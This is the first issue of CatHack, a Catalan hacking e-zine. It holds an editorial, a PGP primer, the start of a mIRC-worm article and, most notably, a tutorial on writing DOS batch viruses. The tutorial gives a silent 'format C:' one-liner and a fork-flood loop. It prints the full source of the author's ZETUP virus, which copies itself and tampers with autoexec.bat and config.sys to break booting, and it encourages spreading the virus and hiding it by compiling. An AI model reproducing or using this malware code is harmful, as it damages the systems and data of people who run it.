       _/_/_/       _/_/_/    /______/
    _/_/  _/_/   _/_/  _/_/     _/
   _/_/         _/_/_/_/_/     _/      _/  _/                 _/  _/
  _/_/         _/_/  _/_/     _/      _/  _/  _/\      /_/_/  _/_/
 _/_/  _/_/   _/_/  _/_/     _/      _/_/_/  _/__\    /       _/ _\
 _/_/_/      _/_/  _/_/     _/      _/  _/  _/   _\  /_/_/    _/  _\   Z.I.N.E




  CatHack ZiNe       [  Nº 1  ]




La primera revista de tematica hpcv en catala.
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´



      .^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^.
      <  BaRner       barner@iname.com        >   
      <  Pop.tPH      poptph@hotmail.com      >
	<  LopeHack     asefeid@thepentagon.com >
      <  PGB          pecuy@ilimit.es         >
      <  KL4RK        12389csb@comb.es        >
      <  QUiCKSHOT    quicky@nettaxi.com      >
      <  Kuduk        kuduk@lettera.net       >
      <  Brainstorm   brainstorm@redestb.es   >
      <  txetxe       txetxe@softhome.net     >
      <                                       >
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
~.                                                                          ~.
~.                             -[ INDEX: ]-                                 ~.
~.                                                                          ~.         
~.  1 * Editorial                           CatHack         opinio          ~.
~.  2 * Virus Batch                         Pop.tPH         virii           ~.
~.  3 * PGP                                 Brainstorm      criptografia    ~.
~.  4 * Virus mIRC                          KL4RK           virii           ~.
~.  5 * Clonacio Etica                      Pop.tPH         phreak          ~.
~.  6 * Cookies		                    BaRner          seguretat       ~.
~.  7 * Es Linux per hackers i              Lopehack        opinio          ~.
~.      Windows per lammers?                                                ~.
~.  8 * NOTICIES BaRner                     BaRner          noticies        ~.
~.  9 * Acomiadament                        Cathack                         ~. 
~.                                                                          ~.
~.                                                                          ~. 
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.



#################################################################################
# Disclaimer                                                                    #
# ~~~~~~~~~~                                                                    #
# La informació presentada en aquesta revista és purament de caràcter educactiu #
#     i serà utilitzada per ampliar els nostres coneixements sobre el tema.     #
#      Cap dels components que formen la revista es fa responsable              #
#        del us que en pogueu fer o dels danys que pogueu causar.               #
#################################################################################






==============================================================================
1 _/                     II·.·. Editorial ·.· II
__/                      II     per CatHack   II
                         II===================II


Aqui us presentem la primera revista de h/c/p/v  (hacking, cracking, phreaking
i virii)  
Despres de un temps preparant-nos escrivint articles, parlant entre tots els 
membres del grup sobre el tema de la revista si la treiem o no, quan la treiem,
etc. Hem decidit d'una vegada per totes que ja era hora que sortis a la llum i es
convertís en la primera revista h/c/p/v en català.  
Potser molts us preguntareu perque l'hem fet en català, oi?  perque és cert que 
d'aquesta manera ens arriesguem a que els lectors sigui menor nombre que si la 
fessim en  un altre idioma mes difos a internet...   doncs nosaltres ho fem perque 
ens estimem la nostre llengua i perque si no ho feiem nosaltres primer possiblement
no ho faria ningu, o si mes no, tardaria en fer-se.






==============================================================================
2 _/                     II·.·. Virus Batch ·.· II
__/                      II     per Pop.tPH     II
                         II=====================II

Després de perdre aquest texte en un accident de la FAT he decidit tornar
a escriure un texte dedicat als virus batch. Aquests virus són els més
simples, i petits, però tenen una desventatja, que són fàcilment detectables
per un usuari amb una mica d'idea, bé d'aixo ja parlarem més endavant.


INTRODUCCI¢:
~~~~~~~~~~~~
Per començar a treballar en un virus batch hem de tenir clares unes quantes
idees, la més important d'elles es que si volem que sigui realment efectiu
només haurem d'utilitzar les ordres internes del shell, aquesta primera norma
molt poca gent l'utilitza, ja que si ens fixem en d'altres virus batch (ZeP,
SkuL,...) acostumen a utilitzar sovint la ordre "find", i si el virus còrre
en un sistema bàsic (només COMMAND.COM, MSDOS.SYS i IO.SYS) no funcionarà ja
que la ordre "find" (per exemple) no la podrà executar.

També hem de tenir en compte el mètode de reproducció que utilitzarà, per
aconseguir això podem utilitzar la ordre "for" que realitza una ordre en
tots els fitxers d'un tipus (*.bat *.txt...), i per acabar hem de tenir clar
les nostres limitacions en utilitzar aquest llenguatge.

A més aquests virus tenen una avantatge...molts antivirus no els agafen! x)

ORDRES:
~~~~~~~
Començaré per explicar-vos totes les ordres que porta el sistema ms2 incloses
en el shell (command.com)- Aquestes ordres les podem veure si obrim amb un
editor hexadecimal el fitxer command.com, encara que haurem de posar una mica
d'imaginació per comprendre quina ordre li correspon a cada definició.

ORDRE           DEFINICI¢
-----------------------------------------------------------------------------
Break [on/off]  Activa o desactiva la possibilitat d'interronpre un proces
                per lots en la seva executci¢ (Control+C)
Call [filename] Aquesta ordre s'acostuma a fer servir en "for's" i demés,
                encara que no té cap utilitat, ja que serveix per executar
                un programa i també es pot executar sense "call"
Chdir / Cd      Cambiar de directori, si no sabeu el que vol dir us ho feu
                mirar.
Cls             Neteja la pantalla, pot ser util al principi del virus despres
                de la ordre @echo off per evitar suspites.
Copy [/A /B /V] Copia fitxers [inici] a [destí], així es simple, pero podem
                utilitzar diversos modificadors:
                /A --- Copia en format ascii (no apte per a .exe o .com)
                       (també es pot subsituir per la ordre "type xx > yy"
                /B --- Copia el fitxer de forma binària (completa)
                /V --- Verifica que el fitxer inicial sigui igual que el final
Command         Es el processador d'ordres, no es interna però sempre està i
                té una gran quantitat d'opcions com /K (per exemple que
                serveix per executar un fitxer i tornar a sortir). per mirar
                totes les seves opcions cal posar "command /?"
Date [xx/xx/xx] Comprova o actualitza la data, pot ser útil per bloquejar la
                DATA (possant una linea al autoexec.bat que digui date xx/xx/x
Del / Erase     Esborra fitxers
Dir [filename]  Llista fitxers o comprova si existeixen per mirar l'ajuda
                cal escriure "dir /?" Algunes de les més importants són:
		/A - Atributs: Llista tots els fitxers que tinguin un atribut
			comú (sistema, ocult, directori)
		/B - Format simple sense encapçalaments
		/L - Minúscules
		/S - Llista els subdirectoris
		-Pot ser util si volem fer llistats de fixers d'un tipus (.bat)
		-per infectarlos (fent dir.bat /l > file.ext)
Echo [on/off/]  Activa o desactiva els missatges dins d'un fitxer bat, molt
                util per amagar a l'usuari els pasos que anem fent. També
                serveix per escriure missatges en pantalla "echo pop" o per
                deixar una linea en blanc "echo."
Exit            Surt del command.com i retorna al nivell anterior (no li veig
                cap utilitat)
For             Serveix per fer un mateix proces a tots els fitxers que
                compleixin una condició:
                        FOR %%var IN (*.bat, *.txt) DO ordre
Goto            Salta a un altre linea del mateix proces per lots, aquesta
                linea a d'estar marcada per una etiqueta (:ini (per exemple)
If [NOT]        Serveix per utilitzar condicions: per exemple:
                        if not exist c:\windows\win.com echo MS-DOS
                        if exist c:\windows\win.com echo WINDOWS
                        if errorlevel 1 echo Error en el procés
                        if errorlevel 0 echo Sense errors en el procés
Mkdir / Md      Crea directoris
Path            Canvia els directoris de treball per defecte del sistema
                per exemple "PATH c:\dos;c:\windows"
Pause           Para el treball d'un proces de lots i continuara quan algu
                premi una tecla, si volem que no surti el missatge podem
                utilitzar "canyeries" (pipes)
Prompt          Serveix per canviar el prompt del sistema (C:\>) podent
                possar texte al final de cada ordre, la data, la hora, etc
                té moltes opcions (per revissarles mireu "prompt /?")
REM             Serveix per deixar missatge en mig d'un proces per lots,
                el texte escrit despres d'aquesta ordre no s'executarà.
Ren / Rename    Canvia el nom d'un fitxer
Rmdir / Rd      Esborra directoris.
Set             Estableix una variable d'entorn.
Shift           Desplaça la possici¢ els valors %0 canvian-lo a %1 i %1 a %2..
Time            El mateix que en la data però amb el temps.
Type            Serveix per veure el contigut d'un fitxer en pantalla, es
                util si volem copiar fitxers (no binaris) sense presentar
                cap missatge en pantalla utilitzant pipes.
Ver             Mostra la versió del Sistema Operatiu (SO)
Verify [ON/OFF] Activa o desactiva les verificacions d'operacions d'escritura
                en disc, estalviant-nos missatges d'error.
Vol             Dona el nom de l'etiqueta de la unitat i el numero de sèrie.


CONFIG.SYS
~~~~~~~~~~
Recordem que el config.sys es un dels fitxers d'inici del sistema i que el
carga abans que el autoexec.bat, aixi que revissarem una mica les seves
possibilitats:

BREAK=x         Moltes ordres de les abans descrites funcionen dins del
                config.sys (es qüestió d'anar probant)
BUFFERS=x       Asigna l'espai de memoria dedicat als tampons de disc
COUNTRY=x,p     Asigna el valor numèric del pais (x) i la pàgina de còdigs (p)
DEVICE=x        Carga un dispositiu en memòria, així pot ser util (com en
                el cas del virus ZETUP que l'utilitza per cargar fitxers que
                no son "controladors" i penjar el sistema.
DRIVPARM=/X:x   Estableix els paràmetres d'una unitat de disc.       
                /D:unitat
                /F:Format del disc:
                        0 = disquet de 5-1/4 320/360k
                        1 = disquet de 5-1/4 1.2mb
                        2 = disquet de 3-1/2 720k
                        3 = disquet de 8     DD
                        4 = disquet de 8     HD
                        5 = disc dur
                        6 = unitat de cinta
                        7 = disquet de 3-1/4 1.44mb
                /T:Nombre de pistes per cara
                /S:Nombre de sectors per pista
                /H:Nombre màxim de capçals
                /C Bloqueja l'entrada
                /N Dispossitiu de blocs no extraible
                ---Després de veure tot així veiem que un virus batch pot
                ---danyar també el disc dur i les unitats de disquet
                ---inutilitzant-les o reduïnt-les...jeje
FCBS=x,y        Estableix el nombre de blocs de control sobre fitxers.
                Com més petit sigui més memòria lliure tindrà...no el farem
                servir al revés oi?
FILES=x         Estableix el nombre de canals de fitxer. (El nombre de vegades
                que es pot obrir a l'hora entre diversos processos.
LASTDRIVE=x     Limita a la ultima unitat disponible la marcada en la x(lletra)
SHELL=[file]    Estableix quin serà el fitxer d'arranc del sistema (command.com
                per defecte) gràcies això podem utilitzar-lo per fer missatges
                extranys: Exemple: "echo shell=virus >>config.sys" -> Al
                Arrancar el sistema de nou dirà: "Fichero de comandos no
                encontrado - coloque el disco con virus y pulse una tecla" xD
                Aquesta ordre també pot ser establerta de forma temporal a
                través de 'set'.
STACKS=x,x      Estableix el nombre de piles utilitzades (si saps d'ensamblador
                ja saps el que són piles) i pels qui no ho saben els dic que
                es com una mena de magatzem on es guarden dades temporals.

SET:
~~~~
Set es una ordre important ja que ens permet deixar canvis temporals de
l'entorn (fins que s'apagui l'ordinador), Unes de les més importants són:

Compspec=[file] Fa el mateix que la ordre SHELL en el command.com del config
Prompt=[param]  Estableix canvis del prompt de forma temporal
TMP/TEMP=[dir]  Estableix el nom dels directoris temporals
winbootdir=[dir]Estableix el nom del directori d'arranc del sistema
Path=[dir]      Fa el mateix que la ordre path però de forma temporal
windir=[dir]    Directori de windows

N'hi haurien moltes més però varien depenent del sistema, per visualitzar totes
les variables establertes escribint "set" et dona una llista d'elles.
Si el que vols es eliminar una variable ho pots fer així: "set [var]="

Aquesta ordre s'utilitza molt sovint per deixar una marca al sistema que digui
que ja està actiu.

Podem llegir les variables de set de la següent forma:
      set pop=1
      echo %pop%
        >> 1 << es el que ens donarà com a resposta.

Quan fiquem un % davant i darrera d'una cadena de texte, l'ms2 enten aquella
cadena com si fos una variable i ens dona el seu valor.


PIPES, ETIQUETES i %:
~~~~~~~~~~~~~~~~~~~~~
PIPES: Les pipes són canyeries, mètodes per redireccionar dades en un sistema,
aquestes pipes són en ms2 bastant poques però encara podem fer us d'elles de
forma útil. Són 3: < | >. Ara les defineixo millor:
<  -  Introdueix dades al eco d'un programa. per exemple:
      "echo q > log" - "debug < log"
      D'aquesta forma quan entri al programa i surti el prompt executarà el
      fitxer log per ordre de linies.
|  -  Aquesta pipe serveix per executar més d'una ordre a l'hora, però com que
      ms2 es bastant simple només visualitzarem 1 ordre:
      Per exemple: "pause | echo." D'aquesta forma conseguim  que executi la
      ordre pause, però no surti cap missatge.
      Aquesta pipe en ms2 està bastant retallada i poc utilitzada ja que no
      permet executar totes les ordres de forma real (ja que no es multitasca)
      En canvi en unix si que funciona bé. Pero no farem virus per Linux oi? ;)
>  -  Serveix per redireccionar les sortides de resposta cap a un fitxer (o
      un dispositiu. Exemple: "echo pop > log"
Sempre podem fer conbinacions entre ells:
"echo pop > log < log2"
I una cosa més per acabar:
Si redireccionem les dades cap a un fitxer així: ">" es borrarà tot el
contingut del fitxer destí, però si volem que només ho escrigui al final hem
de fer una "doblepipe" així: ">>"

Tot aixo ens pot ser molt util per aconseguir per exemple que formategi sense
demanar res:
	echo S | format C: > nul
amb "echo S" li diem que digui si a la ordre següent i amb >nul que no surti
res per pantalla.

ETIQUETES:Són molt importants en aquests virus ja que permeten canviar de linea
amb un simple goto, posarem un exemple:

-----file.bat----
echo LOOP etern (pots sortir amb un control+C)
:ini
goto ini
-----file.bat----

En la linea 2 trobem una etiqueta, cal possar els ":" per indicar que es una
etiqueta i en la linea 3 trobem un goto que ens porta a la linea :ini
Aquest loop es simple, encara que podem aconseguir algunes coses millor que un
simple loop. Com per exemple un Overflood!

-----overflood.bat----
:ini
echo overflood!
overflood.bat
goto ini
-----overflood.bat----

Això anirà executant el el programa un cop i un altre sense sortir del programa
acumulant processos al sistema fins que acabi caient.
Si volem que executi un programa sense fer overflood faríem així:

-----loop.bat---------
:ini
filename.bat
goto ini
-----loop.bat--------

Així executarà el programa de forma ilimitada sense bloquejos. Podem aprofitar
aquest últim programa per bloquejar una hora. canviant filename.bat per:
time x/x/x

També hem de recordar que existeixen unes variables, les "%"...tatxan!
Aquestes serveixen per llegir la linea d'entrada. Per exemple:

C:\>programa.bat 1 2 3
------programa.bat--------
echo Nom del programa: %0
echo Primera variable: %1
echo Segona  variable: %2
echo Tercera variable: %3
------programa.bat--------
i sortiria:

Nom del programa: programa.bat
Primera variable: 1
Segona  variable: 2
Tercera variable: 3


DISPOSITIUS DE SORTIDA:
~~~~~~~~~~~~~~~~~~~~~~~
Aquests dispossitius són accessibles desde el prompt de forma fàcil, (podria
ser el seu equivalent limitat del /dev del Linux) Ens poden servir per imprimir
textes per la impressora, llegir la pantalla, escriure al COM2 (modem), etc...
Les possibilitats són infinites (limitades amb ms2).

Aquí us llisto uns quants dispossitius:

CON        -> pantalla
PRN o LPT1 -> Impressora
AUX o COM1 -> Mouse
COM2       -> Módem
NUL        -> Trash

Aquest últim dispossitiu (NUL) es una sortida nul·la, no té resposta, es com un
lloc buit on hi tirem coses serveix per aconseguir el 0 absolut.


TEMPS DE PROVES (depuració):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Després d'acabar un virus sempre arriba el temps de proves, aquest temps pot
de diversa duració depenent de com sigui de llarg el virus, sempre hem de
dedicar un cert temps (una setmana) a la revissació del còdig font per buscar
errors que a simple vista no veiem, haurem d'executar el virus una i un altre
vegada per comprovar que funciona tot, seria recomenable agafar un d'aquells
80286 o 8086 que tenim tirats sota el llit i provar amb ells, (alguna utilitat
tenen no?)

Un cop feta la depuració del virus podem possarlo ja en marxa, passant-lo als
amics (enemics d'aquí a poc), i a la gent de "porai", per aconseguir major
fiabilitat en el virus podem compilarlo utilitzant el BAT2EXEC, amb aquest
programa converteix el nostre còdig font en un fitxer .COM, (binari) o sigui
no podràn veure els efectes (encara que si que podràn veure algunes de les
ordres i els missatges que sortiràn (problemes de la no-encriptació XOR) Si
no teniu aquest programa podeu plorar o buscarlo a www.filez.com


EXEMPLES:
~~~~~~~~~
Per acabar l'informe us deixo un exemple, el virus ZETUP, creat per mi (com ja
he dit més amunt?)- Es un virus simple, encara que efectiu i a més d'un li pot
portar algun ensurt. jeje. En la nostra pàgina podeu trobar el virus compilat,
el remei (azetup) i un fitxer ben maco que t'explica tot el seu funcionament.

Doncs com anava... el seu còdig font es:

----------------ZETUP.BAT------------------------------------------------------
::ZetUp inicialized...
echo off
if not exist C:\ZETUP.BAT goto init
if not exist C:\BOOT.INI goto init2
if not A%1==A220 echo Your syztem is now well configured.
echo [Error 1] The file BOOT.INI is corrupted. Please delete it.
pause | echo.
goto end2
:init
type %0.bat > C:\ZETUP.BAT
echo # Don't modify this file, because it could spoil your system > C:\BOOT.INI
type c:\autoexec.bat > c:\autoexec.zet
echo zetup 220 > c:\autoexec.bat
type c:\autoexec.zet >> c:\autoexec.bat
echo Please switch on the printer.
pause | echo.
echo "Who a good tree get close, thousand waters" > LPT1
cls
goto end
:init2
type c:\config.sys > c:\config.zet
echo DEVICE=MSDOS.SYS > c:\config.sys
type c:\config.zet >> c:\config.sys
goto end2
:end
echo ...............................................
echo ! Your syztem is now configured               !
echo !  Thank you for use it.                      !
echo !.............................506F702E745048..!
:end2
--------------------------ZETUP.BAT--------------------------------------------

Si us hi fixeu al final he firmat "506F702E745048" en hexadecimal... alguna
prova s'ha de deixar no?

Doncs vinga amb això us deixo! Fins al pròxim texte!.

	Pop.tPH [Quien a buen árbol se arrima, aguas mil]

*******************************************************************************
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------------------------------------------------------
*******************************************************************************
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------------------------------------------------------



==============================================================================
3 _/                     II ·.·. PGP Basic ·.·  II
__/                      II    per Brainstorm   II
                         II=====================II


Eps ! Aqui esta el meu primer article (si es pot anomenar així) fet per dele
itar els paladars dels lectors de la CatHack ! Bon Profit ! Comencem:


Aquest article preten fer una petita introduccio al mon de la criptografia, 
resoldre dubtes (FAQ) i saber com funciona el algoritme d'encriptat que 
utilitza PGP (Pretty Good Privacy) (molt per sobre).

Una mica d'historia: 

Ja fa molt de temps, quant la gent d'Egipte tenia poca feina i es dedicava a 
fer piramides, es va inventar el primer sistema d'encriptat que es coneix. 
Com tot sistema d'encriptat, va neixer amb el proposit d'ocultar informacio 
confidencial a persones no autoritzades. Aquest primer sistema consistia en 
gravar el missatge secret en una taula de fusta i despres es recobria de cera
(si, la de les espelmes). Sobre aquesta cera, es gravaba un missatge que no 
tenia res a veure amb el secret o que era tot el contrari, de manera que si 
aquest missatge era interceptat, l'enemic nomes llegiria el missatge fals, i 
si el missatge arribava al seu desti, era desencriptat. I com ? us 
preguntareu, doncs molt facil, fonent la cera, d'aquesta manera es revelava 
el missatge secret. 

Durant tota la historia, es varen anar perfeccionant les tecniques 
d'encriptat, amb procediments (algoritmes) cada vegada mes complexos. 

Algoritmes simetrics i asimetrics:

Pero tots aquests algoritmes, tenien un petit defecte: eren SIMETRICS.I us
preguntareu: "zimetrico ? , i ezo que e !". Un sistema d'encriptat simetric, 
vol dir que tant el qui envia el missatge com el qui el rep tenen la mateixa 
clau o algoritme per desencriptar-lo. Com podeu deduir aquest sistema es poc
segur, ja que si un enemic s'apodera de la clau, podra desencriptar tots el 
missatges, i tururut cargols ! 
Un exemple de algoritme simetric es el DES (Data Encryption Standard), creat 
per el govern dels EUA. No es gaire segur. Com que un algoritme simetric 
representava un perill per la seguretat del missatge, es va crear l'algoritme 
d'encriptat ASIMETRIC. Aquest ja es molt mes segur, consisteix en generar 
dues claus, una que es pot fer publica, una que serveix per desencriptar 
(normalment es diu privada) i una contrasenya. 

Quant nosaltres rebem una clau publica de un persona amiga, utilitzem aquesta
clau publica per encriptar el missatge. Si un enemic intercepta el missatge, 
es trobara amb quatre problemes:

1.- No li servira el truc de fondre la cera :-)
2.- Li faltara la clau privada (es impossible deduir la clau privada desde la
publica).
3.- Li faltara la contrasenya de la clau privada.
4.- En el suposat cas de que s'apoderi de tot lo anterior, si la contrasenya 
esta ben triada (es llarga, sense logica i lletres, numeros i simbols 
barrejats), tardaria tres big bans i 200 extincions de dinosaures en 
desencriptar el missatge (NOTA: Això és una vil exageració, ja que la potència
dels sistemes va augmentant casi exponencialment i hi han molts parametres
que no es controlen, tot i així, per el metode de força bruta, es tarda MOLT
en poder trobar la clau) 

Un sistema asimètric sembla mes segur, no? Doncs PGP es basa en ell. 

Que coi és PGP ?

PGP es un sistema d'encriptat asimetric creat per Phil Zimmerman, es una 
barreja dels sistemes d'encriptat mes utilitzats, menys el de la cera :-)) 
(DES, IDEA, Triple-DES i RSA). Es basa en complexes operacions matematiques 
per tal de deixar el missatge secret fet una sopa de lletres a ulls d'un 
enemic. Lo primer que fa PGP al encriptar un missatge, es comprimir-lo, 
perque ? doncs per dues raons: Ocupa menys espai i el resultat es una sopa de
lletres encara mes remenada (proveu de comprimir un text amb zip i despres 
editeu-lo, a veure si podeu llegir-lo, si podeu, truqueu a Mulder i a Scully)
, de fet, comprimeix el texte amb una versio freeware de pkzip, i si el text
es massa petit o ja esta comprimit, no el comprimeix. I despres l'encripta 
utilitzant els algoritmes anteriors, pero abans, es firma el document, i que 
vol dir firmar en un ordinador? Doncs lo unic que fa la firma es fer un CRC 
del missatge, es a dir que si un sol bit del missatge es canviat, els 
resultats son completament diferents i la firma comprova que aixo no passi.

Steganografia:

La steganografia es un sistema que permet ocultar missatges encriptats dins 
de imatges o sons, es una molt bona manera d'ocultar la informacio, ja que 
pot passar totalment desapercebuda a ulls (o orelles) d'enemics, ja que per 
exemple, en el cas dels sons, un text, programa o lo que vulguis ocult dins 
un so, provoca una diferencia d'1 db (decibeli, unitat de so), inperceptible
a la oida humana. 
El programa que fa tot això per windows es diu S-TOOLS. Es pot trovar a 
www.kriptopolis.org. 



FAQ (Frequently Asked Questions):

1.- P: "Es possible crear una clau PGP per a una llista de correu ?
    R: "Si, es possible, i amb altissims nivells de seguretat, a continuacio
        explico el procediment:
   1.- UNA persona de la llista genera un parell de claus pgp (PRIVADA I 
       PUBLICA) amb el password corresponent, sigui aquesta persona, 
       l'individu "X".
   2.- "X", rep totes les claus PUBLIQUES de cada usuari del grup, amb
       l'objectiu d'encriptar UNICAMENT la contrasenya i la clau PRIVADA de 
       l'usuari "X" (ell mateix).
   3.- "X" encripta la contrasenya i clau PRIVADA generades per "X"
       (ell mateix) amb les claus PUBLIQUES rebudes dels usuaris.
   4.- "X" envia a un usuari "Y" de la llista aquestes coses:
       La clau publica generada per "X", la clau PRIVADA generada per "X" i 
       la contrasenya de "X".
       ES DE VITAL IMPORTANCIA QUE TANT LA CONTRASENYA COM LA CLAU PRIVADA,
       ESTIGUIN ENCRIPTADES AMB LA CLAU PéBLICA DE L'USUARI "Y".
   5.- "X" repeteix el procediment per cada usuari "Y" de la llista, fins que
       TOTS els usuaris "Y" tenen el pas 4.
   6.- Cada usuari "Y", a la hora d'encriptar, hauria d'utilitzar la clau
       PUBLICA generada per "X", i per desencriptar, la clau PRIVADA generada
       per "X".
   7.- Cal recordar que donar la clau privada i la contrasenya a un usuari no
       conegut es el mateix que no utilitzar PGP.

2.- P: "Pero aquest procediment criptografic esta generat per el govern i
       poden tenir backdoors, no?
    R: NO. El algoritme de PGP l'ha creat "Phil Zimmermman" un reputat 
       criptograf, i careix de backdoors, és una barreja de sistemes 
       d'encriptat, per aixo s'anomena sistema d'encriptat hibrid. 
       Ademes, si es distribueixen les fonts, com seria possible que un 
       programador al analitzar el codig no s'enteres de qui hi ha una 
       backdoor ?. Sino mireu el text de mes avall extret de la raregazz. 

    LLEGIU ATENTAMENT:
__________________________________________________________________

"Casi todos los cripto-analistas coinciden en que el costo de horas hombre 
asi como el tiempo que una supercomputadora tardaria en romper el codigo a 
base de ataques de fuerza bruta haria incosteable el hecho de romper todos
los codigos de encripcion creados al hazar. Como un resultado de esto, las 
regulaciones del gobierno han sido creadas. La Agencia de Seguridad Nacional
(NSA) estadounidense hacreado el algoritmo DES (Data Encryption Standard) que
es como su nombre lo dice, un estandard de encripcion. Este metodo de 
encripcion es basicamente solido y toma un tiempo largo para romperse. DES si
se puede quebrar, solo que toma un "tiempo inrazonable para quebrar". El 
ataque hacia la palabra "inrazonable" continua haciendose mas fuerte cada dia
.Conectando algunas computadoras DEC'S en red y la velocidad actual de las 
super-computadoras la longitud de tiempo se ha convertido en "razonablemente"
baja para quebrar un archivoencriptado con este sistema. Obviamente DES era 
una iniciativa delgobierno para controlar la encripcion y esperar que el 
publico se la tragara, pero las cosas no salieron como lo esperaban y han 
sidoquemados con criticas de todos los sectores. Su metodo de encripcion 
resulto demasiado debil y su intento de invadir la privacidad noresulto.En 
1992 aparecio en la red un programa gratuito llamado Pretty Good Privacy que
significa Muy Buena Privacidad. Mejor conocido por sus siglas en ingles, PGP
permitia codificar achivos usandoun algoritmo de encripcion llamado RSA que 
permitia garantizar la privacidad del mensaje y ademas asegurar que un 
mensaje solo pueda ser leido por la persona a la que esta destinado. Los 
mensajes enviados usando PGP solo pueden ser vistos por la persona a la que 
vaya dirigido el mensaje. Ademas, para enviarte un mensaje necesitan contar 
con tu llave PGP publica. PGP funciona de esta manera: cada usuario que 
necesita contar con su computadora propia ya que almacenara en su disco duro 
2 llaves necesarias para llevar a cabo la encripcion y des-encripcion de los
archivos. El usuario necesitara contar con 2 llaves propias, la secreta y 
publica. Obviamente la secreta debera estar bien almacenada en un diskette 
por seguridad y la publica podra ser distribuida a sus conocidos. Para el 
manejo de las llaves PGP cuenta con un llavero que permite visualizar las 
llaves almacenadas en los archivos SECRING.PGP -El llavero con la llave 
secreta- y PUBRING.PGP -El llavero con las llaves publicas-. Si alguna 
persona desea mandarte un archivo encriptado, necesitara tu llave publica y
su llave secreta. Es decir, si yo quisiera mandarte un archivo para que solo
puedas leerlo tu tendria que decirle a mi programa PGP que usara tu llave 
publica para decirle a mi llave secreta como encriptar el archivo para que
puedas des-encriptarlo. Cualquier archivo encriptado usando tu llave publica
solo podra ser leidopor ti lo que es una garantia en la seguridad. Existen 
programas que permiten codificar y des-codificar archivos con una clave
numerica y solo los conocedores de esa clave podran ver los archivos.Es uno
de los sistemas mas simples de encripcion y tambien uno de los mas inseguros.
Este sistema necesita una forma de comunicacion segura por la que se pueda 
transmitir la clave para llevar a cabo la encripcion y la desencripcion. 
Resulta tonto necesitar una forma de comunicacion segura para transmitir la 
clave ya que si se cuentacon una forma de comunicacion segura entonces para
que diablos necesitan la encripcion?Nota: El correo electronico * NUNCA * 
es una forma de comunicacion segura ya que cualquier persona que haya 
obtenido derechos de SUPER USUARIO puede husmear el correo electronico de 
cualquier usuario de ese servidor."
________________________________________________________________________

3.- P:"Hey ! RSA s mes fiable, perque no canviem a RSA !
    R: PGP ESTA BASAT EN RSA. En altres paraules, el nucli de PGP= algoritme 
RSA + DES+IDEA+ALTRES.)

4.- P:"Perque no fem sistema d'encriptat nosaltres mateixos?
    R:Llegiu tambe molt atentament aquest text (extret tambe de la rare o la
    set, no se) i trobareu la resposta:

_______________________________________________________________

"(...) Apuesto a que desearias hablar con un cripto-analista. Esta gente son
tradicionalmente los mas grandes hoyos en los que he puesto mis ojos. En su 
mente estagente ha estado debatiendo los conceptos de la encripcion desde 
tiempos remotos y si tu apareces con un metodo totalmente nuevo de encripcion
de datos -TU ESTAS INSULTANDO A TODOS LOS QUE HAN HECHO ENCRIPCION-. 
Simplemente por decir "Oh, Se me ocurrio una idea para encriptar que puede 
ser una de las mejores hasta la fecha" cuando lagente ha dedicado toda su 
vida a disenyar y romper a las tecnicas de encripcion-- asi que te hace 
pensar que eres tan brillante?"
 _____________________________________________________________________

5.- P:" Ho sento pero es que soc un vago del copon i no em mola anar fent 
    "cut & paste" tota l'estona amb PGP"
    R: "Una alternativa al netscape mail es Eudora, aquest programa si que te
    un plugin per PGP ben parit, pero igualment estic buscant el plugin per el 
    netscape, de moment no l'he trobat, podrieu ajudar una mica, no ?


"En fi, si voleu moltíssima mes informacio, baixeu-vos el PGP a www.pgpi.com
i amb el programa ve una extensa documentacio.I tambe a Kriptopolis 
(www.kriptopolis.org). Per cualsevol dubte, correccio, comentaris o simple
ment per criticar l'humor pesim que he utilitzat, escriure (sempre amb la
clau PGP) a brainstorm@redestb.es.


"There are two kinds of cryptography in this world: cryptography that will 
stop your kid sister from reading your files, and cryptography that will stop
major governments from reading your files"





==============================================================================
4 _/                     II ·.·. mIRC VIRUS·.·  II
__/                      II      per KL4RK      II
                         II=====================II






--Nota preliminar:--
Aquest text inclou informació que pot ser directament utilitzada per proposits
il.legals, si més no foscos. No assumeixo qualsevol tipus de responsabilitat 
per l'ús que en feu.
--------------------

Tots els mIRC virus/worms que conec es basen en els *.ini's que utilitza el mIRC
per replicar-se i alhora crear un mircscript que representa, tot sigui dit :) ,
un gran problema de seguretat ja que es permet entre d'altres funcions accedir 
remotament al disc dur de l'incaut infectat.

Saber si s'està infectat no és gaire dificil, perquè tot i que el worm s'encarrega
de que tu no te n'adonis (el worm es propaga mitjançant dcc send) minimitzant les 
finestres dcc send, "hom" se n'adona perquè rep queixes (o potser kicks/kickbans) 
a causa de que es van enviant automàticament copies del virus a altres la qual cosa
 molesta enormement.

Per contagiar-se, cal 
	a) Acceptar rebre l'arxiu quan sigui enviat via DCC SEND
	b) EXECUTAR l'arxiu.

És a dir que per no contagiar-se cal simplement no executar l'arxiu, o potser millor
no acceptar dcc sends de *.exe's, la solució més evident (uhm... potser no tant obvi
pels milers d'infectats per worms variats :) )

--Nota:--
Un concepte ha de quedar clar sobre l'arxiu script.ini. Tenir un arxiu "script.ini" NO
significa estar infectat per res, ja que és un nom d'ini molt comú on el mirc guarda 
scripts. El mític i ja gairebé erradicat (si algu el té que me l'envii siusplau) worm 
"script.ini" consisteix en un script maligne, que substitueix el script.ini original 
per un de víric. Amb això vull dir que qui a hores d'ara pensi que tenir un arxiu 
script.ini a l'ordinador signifiqui estar infectat amb un worm ha de tornar a llegir
aquesta nota.
---------

Un cop aclarit això, passem a parlar dels worms més detalladament.



*** DMSETUP ***


-- Executables: 

	El nom de l'executable és molt variable. És un nom compost per 
dos elements, escollits sembla que aleatòriament, del conjunt 

"BUNY LOVE SEX TOE PEE INST GOD FUN ICQ IRC MIRC POWR JNK NUKE UDP LIM SET CFG HELL
 PUSY TIT DICK 69 101 YES ARM 311 BUD FUCK EAT"


-- Funció: 

